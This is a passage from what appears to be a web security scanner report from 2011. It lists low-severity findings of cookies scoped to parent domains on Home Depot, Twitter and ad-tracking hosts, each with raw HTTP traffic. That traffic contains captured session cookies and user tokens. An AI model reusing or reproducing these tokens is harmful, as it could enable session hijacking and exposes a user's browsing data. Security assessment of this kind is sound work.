Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiZodHRwOi8vdHdpdHRlci5jb20vUmhvZGVJc2xh%250AbmRFTUE6D2NyZWF0ZWRfYXRsKwhRUgYhMQE6B2lkIiU2M2Y1MDg3N2RhMTM0%250AODk3YmI1NTYwNDAzNTkyNWE1MzoMY3NyZl9pZCIlYzhlNzI5MTQ0Nzk1YjU0%250ANDhkNjk4YzJkMWFmMzQ1ZmUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--f85f91307c1e2d3da5ae66c2d365ecfdde397c4f; domain=.twitter.com; path=/; HttpOnly
Connection: close

GIF89a.............!.......,...........D..;

10.3. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemDisplay

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.homedepot.com
Path:   /webapp/wcs/stores/servlet/OrderItemDisplay

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/OrderItemDisplay?jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=131526257&catalogId=10053&quantity=1&orderItemId_0=339315499&orderItemId=339315499&langId=-1&catEntryId=202349118&storeId=10051&ddkey=OrderItemAdd HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Search?keyword=xss&selectedCatgry=SEARCH+ALL&langId=-1&storeId=10051&catalogId=10053
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; Coradiantuserid=82f95932-9eee-1ce7-9678-00e0ed0ed026; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0245525d5f4f58455e445a4a422991; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; VISITORID=910187893; WCSSESSIONID=0000QiM4nuQJ3aVixF3NjrJw_1o:1146agca4; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=JMxYfo5MdQHKu9q8vDJ%2brG6L1y0%3d%0a%3b2011%2d07%2d12+12%3a43%3a57%2e331%5f1308225529140%2d4164%5f10051%5f295945051%2c%2d1%2cUSD%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=2; s_pers=%20s_campaign%3Dno%2520value%7C1310490955491%3B%20s_prevPage%3Dmostpopular%7C1310490955494%3B%20p_30%3DCategory%7C1310490955496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Dmostpopular%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Emostpopular%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Dmostpopular%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_6%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; 
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita76%2fWC%5fTHD%5fccaita76%2f1310489156635%3a%3bC25%5fEXP%3d1362329156%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; WCS_UNIQUE_ID=yDNOewjWomI76%2bqwH5XtmS%2f3xy4%3d%0a; WC_USERSESSION_295945051=295945051%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1310492756905%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2c3eMnbb1h3WdO2u5VxBUQ9gMGN8U%3d

Response

HTTP/1.1 302 Moved Temporarily
Server: IBM_HTTP_Server
Surrogate-Control: no-store
Location: http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=131526257&quantity=1&catalogId=10053&orderItemId=339315499&orderItemId_0=339315499&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202349118&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Tue, 12 Jul 2011 16:45:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 16:45:57 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita76%2fWC%5fTHD%5fccaita76%2f1310489157221%3a%3bC25%5fEXP%3d1362329157%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529;Domain=.homedepot.com;Expires=Sun, 03-Mar-2013 16:45:57 GMT;Path=/
Set-Cookie: WC_USERSESSION_295945051=295945051%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1310492757250%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cdUmHi5LdyePSUlqCjwXXsfwRdqQ%3d;Domain=.homedepot.com;Path=/


10.4. http://ad.trafficmp.com/a/bpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=598&id=255&format=1310503191 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nab=7; nat=1305981242875; uid2=4372bf1d7-7ad8-48eb-b49d-630d41f880f6-gnq0edmv-10~2011051519270862126421219180~59a3b184-a1c6-4aca-8101-9ed4e07fe4c6-31~3460050161923843111~375c6d96-66e4-4358-973b-0d6c0203afb3; dly2=3-lmv2b7-; dmg2=2-null7566%4051%4060+65%3A61%3A64%3ACZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; hst2=3-lmv2b7-1~fkog64qf50c8~13uj~5al9~0-1~138yfzzfhnn6~136l~5hy9~1bcqu-; pct=1-oevyvt~gnyji5u3-vOrunivbe~gnyji5u2-yhpvq~gnyji5u3-; T_bmu3=77k%3A2zz5q%3A1; rth=2-ll8nk2-77k~2zz5q~1~1-dlx~232i9~1~1-c8z~2029o~1~1-ihn~1trsh~1~1-i6p~xuvr~1~1-d3b~wekz~1~1-5d8~ps6l~1~1-40~opiw~1~1-41~ms0a~1~1-djj~ml3p~1~1-g9a~mkwu~1~1-gfx~maxm~1~1-djc~m9g8~1~1-g9e~m8m9~1~1-dim~m821~1~1-dil~m811~1~1-icn~m7h0~1~1-icz~m7ep~1~1-gqh~m7do~1~1-iel~m79d~1~1-h4d~b20b~1~1-g96~9x0t~1~1-jd9~z20~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Tue, 12 Jul 2011 20:39:51 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_bmu3=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_cure=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_4qye=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5sus=jd9%3A2zz6e%3A1; Domain=trafficmp.com; Expires=Wed, 11-Jul-2012 20:39:52 GMT; Path=/
Set-Cookie: rth=2-ll8nk2-jd9~2zz6e~1~1-77k~2zz5q~1~1-dlx~232i9~1~1-c8z~2029o~1~1-ihn~1trsh~1~1-i6p~xuvr~1~1-d3b~wekz~1~1-5d8~ps6l~1~1-40~opiw~1~1-41~ms0a~1~1-djj~ml3p~1~1-g9a~mkwu~1~1-gfx~maxm~1~1-djc~m9g8~1~1-g9e~m8m9~1~1-dim~m821~1~1-dil~m811~1~1-icn~m7h0~1~1-icz~m7ep~1~1-gqh~m7do~1~1-iel~m79d~1~1-h4d~b20b~1~1-g96~9x0t~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-; Domain=trafficmp.com; Expires=Wed, 11-Jul-2012 20:39:52 GMT; Path=/
Content-Length: 0


10.5. http://ak1.abmr.net/is/www.burstnet.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/www.burstnet.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.burstnet.com?U=/enlightn/8171/99D2/&V=3-rh9n44mHYsRLbm+zoiYMT7qn+rYj+Xiz1ZIyeB%2fTJuiRaZwc2R1ZsA%3d%3d&I=364AB5B4B4DE32D&D=burstnet.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/allgames.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-6D09C81E483B985A8C970170ED8A390DC9D7E844E4FADC48A5FF1F1CB4BDF136-962A4C6AE45D1257D630E27E6C9C4842CB9EEE84D8216132129E6DE75E18BFFD

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.burstnet.com/enlightn/8171/99D2/?01AD=35NsWEwVsyHSe121SiR9iwgYe6LgCBL2ajyjhr10hlf28AYn5RiT8aA&01RI=364AB5B4B4DE32D&01NA=
Expires: Tue, 12 Jul 2011 20:39:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 20:39:27 GMT
Connection: close
Set-Cookie: 01AI=2-2-FCCFE70FC078DF56F822F11184DD577711D1122C5237AE2450DD7C528764A808-B6B889F3E8363450BBEA94C78C886431A3DEBFBDA1848E28D8622FD8361BC0A3; expires=Wed, 11-Jul-2012 20:39:27 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


10.6. http://ak1.abmr.net/is/www.imiclk.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/www.imiclk.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.imiclk.com?U=/cgi/r.cgi&V=3-qfDDCciHIXyt2Irl1Kmr5oyrkqgN%2fYy5l3G2%2f+6CedKCVse0QGcBN9hA6YEDmt2X&I=02572381EDA0358&D=www.imiclk.com&01AD=1&m=3&mid=GQuHAQvv&did=games HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/allgames.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-0F09B572DEDC4E19CCE2FC3D3FB1796F8193C44ADF634733BA45870558999840-78641FCDBFB471CBB3EE6872396948E29B863DB921DCF34961B4F56AAD8BCA6C

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.imiclk.com/cgi/r.cgi?01AD=2-2-6FE485614C0BA96C655D4B05A9C02B17EBF2C473C8B99D541110B62E6B105162-09F22A76A2DFA626E13613B1F948D0A8E9FF53D471AAFA67F35E933D3B3BDA13&01RI=02572381EDA0358&01NA=&m=3&mid=GQuHAQvv&did=games
Expires: Tue, 12 Jul 2011 20:39:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 20:39:27 GMT
Connection: close
Set-Cookie: 01AI=2-2-ADF10014E4A43A066D5B2D3C72879A1FF451007B3D76D32FDC272F60C7891715-AC66A02713FC636745EAA11C681C5FB4381547F40591FF69D8FEF24E6B871AC5; expires=Wed, 11-Jul-2012 20:39:27 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


10.7. http://ak1.abmr.net/is/www.lowes.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/www.lowes.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.lowes.com?U=/images/blank.gif&V=3-P%2fXkUX0BomDTWP2A4PNfzlC691C5HH5j9+allLRENBG7nSEOhAszDQ%3d%3d&I=2F94A1DBD58FE8F&D=lowes.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-D5D9220AA35D8439F0F42B617821A32CA8F3F33CDE5D411FA3F6E0316F5E941D-EA3B06293D2F4D903262810809104EA0CA2B8A09EF6105BEECFACF4E76C80952

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.lowes.com/images/blank.gif?01AD=3NY-YUTTJuGK2HiDQyNEZ_pXmPlUobdy-vZgQV0lZuWVlCd7sXS36Wg&01RI=2F94A1DBD58FE8F&01NA=
Expires: Tue, 12 Jul 2011 21:30:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:48 GMT
Connection: close
Set-Cookie: 01AI=2-2-588A1646FB542241472A8B4440942118BA09C37ACD5A2B656F23045D42DB1862-E89A6F43FA6979A9F8EEDA48EC83D287A682F51269B1357F0CA7CF6B32B6B074; expires=Wed, 11-Jul-2012 21:30:48 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


10.8. http://akamai.mathtag.com/sync/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://akamai.mathtag.com
Path:   /sync/img

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sync/img?mt_exid=10001&mt_exuid=72A94FA79EF536BD82125331F1DA512C&rurl=4-y4KAKxbMbUW6%2fd2XlI2h7omXveorHH1wjE3YPYm1CcU78fAjlPlkmtyHROSto8g1IHztMlSiGkudhacrtA2vilpGScyJI9PpEUcqmEFv2zphJWXr%2ff8w2Y%2fyQykdVQFucM9exn2xomjGUAzUdNo8JSkUO0QrBwFBP61FHfjWIggU+CKyZPO8lg%3d%3d&V=3-xmZkZ0vxVlK+Qt0Cy0o%2fhjkSyICqOr15F%2fuz8Eau8RYdGQm+gll3R5yHYfIfaMxH HTTP/1.1
Host: akamai.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530; ts=1310068527; mt_mop=5:1310068391|4:1308922018|10002:1310068527

Response

HTTP/1.1 302 Moved Temporarily
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x1 pid 0x1b3a 6970
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
ETag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
Content-Length: 43
Expires: Tue, 12 Jul 2011 16:35:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 16:35:42 GMT
Connection: close
Set-Cookie: ts=1310488542; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 16:35:42 GMT
Set-Cookie: mt_mop=10001:1310488542|10002:1310068527|4:1308922018|5:1310068391; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 16:35:42 GMT
Location: http://www.homedepot.com/hdus/en_US/DTCCOM/HomePage/Images/pod01.jpg?01RI=4D0F64FD5BE586C&01CM=cm:akamai.mathtag.com&01NA=ck&

GIF89a.............!.......,...........D..;

10.9. http://akamai.turn.com/r/dd/id/L21rdC85NC9jaWQvMzUxMTE3Ny90LzI/dpuid/C87B49F9CF448D1C1BA69C0215C3FF64

Summary

Severity:   Information
Confidence:   Certain
Host:   http://akamai.turn.com
Path:   /r/dd/id/L21rdC85NC9jaWQvMzUxMTE3Ny90LzI/dpuid/C87B49F9CF448D1C1BA69C0215C3FF64

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC85NC9jaWQvMzUxMTE3Ny90LzI/dpuid/C87B49F9CF448D1C1BA69C0215C3FF64?rurl=4-ZoGlonpeVWkOF2PDBLGWw8jX2rf2aUXPIHvJWMiS%2fMFLEjNI3s%2f9DnATzmp95y3urXn%2fFAB%2fM1TSaBw6pqc4toFzvnQWIzORuKcqMX51pqNoIj1piOIxqohjb8%2f2MTc35k33Yetab++BMlQPEiVFOdnB4hi3nN35K8Eb4LM0krE%3d&V=3-MbpG1sgu7yHCr0MOC43F%2fUI03ub%2fbGLRcnCBrWk85VppPXUBZwjQSQ%3d%3d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: akamai.turn.com

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Content-Type: image/gif
Content-Length: 43
Expires: Tue, 12 Jul 2011 21:32:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:12 GMT
Connection: close
Set-Cookie: uid=3787648658091279733; Domain=.turn.com; Expires=Sun, 08-Jan-2012 21:32:12 GMT; Path=/
Location: http://www.lowes.com/images/my_store_more_info_greybox.gif?01RI=CE4893FA547B6E9&01CM=cm:akamai.turn.com&01NA=ck&

GIF89a.............!.......,...........D..;

10.10. http://at.amgdgt.com/ads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=2762&rnd=1310503167 HTTP/1.1
Host: at.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?01AD=2-2-C853333EC652166FAF7E3D0062149675759E1277B74C3E759400B711FCF64130-AD2295ECB4683944460A9D5F04A88CAF4EB4854AF4BF19B0D63B2248D4643BCA&01RI=02572381EDA0358&01NA=&m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUDr76b_h3npPQP5udtMJYvQm5U9oDA3gBdZLPSxRxGIef98vOqkQEJiGxICJ6WNBERCNR6ZJ6UAj0L1ghg1jxKOGPLrJaCoIheLGiVTF_hiGs4nbwIB08CEEQLiIYbIGCiuZm0us0u3Oa03feeeaZdz7vO8BtzPhvrEczSNkHOD4BckDK5z8uV2FWG7CaQkh1K6SqXBbtcrxZ9WbVO06zwVtNQcdrV69NvWqXPQxjJsNYj5eRijichdMskjztxkRfKTtHKqfg_JfLjkYwc8.wQiXI_edw6c.wvYFszOIbrPYl5EEj_J1x2YsAZiKkGXqQe0Nwoj3_54t8PyzFrGwre4nULMLVqcuShZrvj84lqvlWNN9lhu0MjGm.FvVatd.6ejov5507vV8xo21YtXlI8ACOEhkW__IUs7GLVTeJ1G8iRmfqePHNhLcXS3p7n1Je.4vELnK89heJ_fiJ6djHd5BCSnR_ic70twS.FU_rtfF014I3PXuuFZeqS_PVcD83oKBbigR8SxLQg3IfYvn9kqXFk9c2KtySXK3efrZvTkftBxca7ePue7mj7N22zab6JF8r58e87sI_BrShaw--

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUcy1Eb6q7HN_gnTNnrLjvLE6pZsoDA3gBdZHNS1RhFIef8zJXHCJaGIHjRLlQZPArESeLCjfmbARB_4IRUpCRlhJmbmT6QAiSoI0VjYpaOqEIYzQtXEQLF0IgiIMIBpOQoJI6mni8zcxd3dW5933u8577Owcowrw.xGqeQKqnYHcP8ILUfvwcb8As3McKhZFgO2QaHBZ7mPUm1ZtUbzfHnl4KBbJep3od6gUd1hTBjEaw2uJIXRL.RnIsmt7vw8ReKDtA6sfgYNthO8OY6R6scDly8xGcFOTZxlAhZuYtVucscqsF_k04bNCPeRPWDP1IzTPY057_80XX_lRh5paVPUduz8DpvsPSpZrvWOcS03xzmu8kz1aGXmm.VvXatd8X9XRe2TtXHv_EvOzAunMZCWzBTirPkj.6MV_Xse6OIveWEKMzzXrJpZS7l0i7e_MZt_1FE0det_1FE79.Y7o28WxlkHLdX6o39y_.1bJxfTau7mLgomvPxbIqdWktGX7CBbjWp9c0CnhmpU4LtQVXpNjjkxLxy1U9eDAi57j0u1RoeffNPhyP2R9_arGL74NUKnu_bLOxAanWN7lxvah38LwVnAFxqaDU; Domain=.amgdgt.com; Expires=Thu, 11-Aug-2011 20:39:29 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://cdn.amgdgt.com/base/pixels/transparent.gif
Content-Length: 0
Date: Tue, 12 Jul 2011 20:39:28 GMT


10.11. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=7518284&rn=934038782&c7=http%3A%2F%2Fblog.katango.com%2F&c8=Katango%20Blog%20%7C%20Trends%20and%20insights%20on%20personal%2&c9=http%3A%2F%2Fprod-apache-load-balancer-782580564.us-west-1.elb.amazonaws.com%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blog.katango.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 12 Jul 2011 20:46:59 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Thu, 11-Jul-2013 20:46:59 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.12. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=add&advid=2996&token=LOW21 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1160694;type=lowes714;cat=homep272;ord=1;num=7992032719776.034?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
